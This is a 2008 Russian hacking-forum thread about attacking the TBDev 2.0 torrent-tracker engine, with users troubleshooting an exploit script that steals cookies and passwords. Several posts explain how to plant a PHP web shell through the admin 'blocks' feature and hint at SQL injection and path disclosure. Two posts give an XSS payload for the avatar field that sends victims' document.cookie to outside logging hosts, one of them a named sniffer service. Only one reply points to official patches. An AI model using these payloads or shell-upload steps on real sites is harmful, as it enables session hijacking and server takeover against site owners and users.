Трекер-движок TBDev 2.0

Discussion in 'Веб-уязвимости' started by Qwazar, 5 Aug 2008.

  1. holden321

    holden321 New Member

    Joined:
    31 Oct 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    я понимаю что залить шел, но залить шел админ может ?))
     
  2. Uname-A

    Uname-A Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    73
    Likes Received:
    12
    Reputations:
    5
    Ваще самый лучший способ залить шелл это создать пихапе блок с формочкой загрузки файла Я так и заливал шелл
     
  3. Elenberg

    Elenberg New Member

    Joined:
    5 Jul 2006
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
    Плизз нид хелп!
    на висте х64 неудается запустить скрипт by Qwazar, вместо выполнения просто выдается содержимое файла.
    Пхп тот что нужно
    Если кто занет в чем может быть причина, подскажите плизз. :(
     
  4. Витян

    Витян Elder - Старейшина

    Joined:
    25 Dec 2006
    Messages:
    190
    Likes Received:
    83
    Reputations:
    14
    нармальные патсаны юзают vmware с xp sp2 и не знают проблем)
     
  5. Elenberg

    Elenberg New Member

    Joined:
    5 Jul 2006
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
    vmware с xp sp2 непомог, так же просто выдается содержимое файла(((
     
    #45 Elenberg, 18 Dec 2008
    Last edited: 18 Dec 2008
  6. OMG!!

    OMG!! Elder - Старейшина

    Joined:
    25 Feb 2008
    Messages:
    230
    Likes Received:
    70
    Reputations:
    -3
    Qwazar, обьясни пожалуйста, как закрыть эти дыры ( защититься от сплойта.. раскрытия путей и т.д. ) +. ;)
     
  7. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    На офиц. сайте http://bit-torrent.kiev.ua/ на форуме есть заплатки для этих уязвимостей ;)
     
  8. _Sniper_

    _Sniper_ Banned

    Joined:
    21 Jul 2007
    Messages:
    409
    Likes Received:
    147
    Reputations:
    -17
    Скажите как залить шелл через блоки? А то почитал всю тему..Ничего не понял.
     
  9. OMG!!

    OMG!! Elder - Старейшина

    Joined:
    25 Feb 2008
    Messages:
    230
    Likes Received:
    70
    Reputations:
    -3
    _Sniper_, как как.. легко ) Админка - Блоки - добавить файловый блок. указываешь тип PHP потом в поле тупо вставляешь код шела ( лучше криптованного ). и потом юзаешь по ссылке _http://targetsite/tracker/blocks/shall-block.php или block-shall.php не помню )
     
    1 person likes this.
  10. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Ну у них же там на главной написано :)

    Вот, в общем, топик где были предложены их исправления. Имхо нифига не элегантно и порой избыточно, но: http://bit-torrent.kiev.ua/bnovlenie_bezopasnosti-t3319/index.html?t=3319
     
  11. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    У меня при использовании сполйта пишет что неверные куки, pass incorect, хотя всё правильно. ЧТо не так?
     
  12. DREASTY

    DREASTY Elder - Старейшина

    Joined:
    19 Nov 2007
    Messages:
    38
    Likes Received:
    21
    Reputations:
    1
    Arigona
    Посмотри чтоб в конце адресса был слеш!
    http://target.com/ 1 bla bla
    у меня именно в слеше была проблема!
     
  13. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    Тоже самое :(

    Trying to get your cookies... Can't get cookies.. Pass incorrect?
     
  14. злойдядька

    Joined:
    20 Nov 2008
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    все прекрасно пашет, читай ман по SQL, разве не видиш что ругается на синтаксис ? значит скуля есть, тоько ты пишеш не правельно! Вообщем патч хендс

    з.ы. если прочтеш внимательно мой пост с багой то там написано ПРИМЕР, тоесть это пример конкретно для сайта на котором это проделывал я, у вас и версия SQL может быть другая и путь другой, как найти путь написано в этой же теме, поэтому если у вас не хватает знаний чтобы заюзать багу, то не нужно кричать что она не пашет!
     
    #54 злойдядька, 20 Dec 2008
    Last edited: 20 Dec 2008
  15. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    А вот у меня сломало и соль, для чего она и как её использовать?
     
  16. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    В настройках профиля во вкладке аватар можно реализовать XSS:

    Code:
    http://host.org/1.jpg onload= location.href='http://host.org/log.php?c='+document.cookie;//
     
    1 person likes this.
  17. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    Qwazar, понял.

    А возможно реализовть сплоит под другую sql уязвимость? У многих нет requests.php просто..

    вот раскрытый путь обнаружил:


    details.php?id[]=

    мне кажеться тут что-то скрывается :)
     
  18. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    baltazar, как?

    ВОт если я пользуюсь снифером na-s.ru

    http://google/1.jpg onload= location.href='http://na-s.ru/limage.jpg?c='+document.cookie;//



    Правильно?
     
  19. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    Как можно загрузить шелл имея админа? Реально такое?
     
  20. s_p_a_m

    s_p_a_m Elder - Старейшина

    Joined:
    8 Feb 2008
    Messages:
    100
    Likes Received:
    58
    Reputations:
    4
    через админку, создеш блок и вписываеш туда код шелла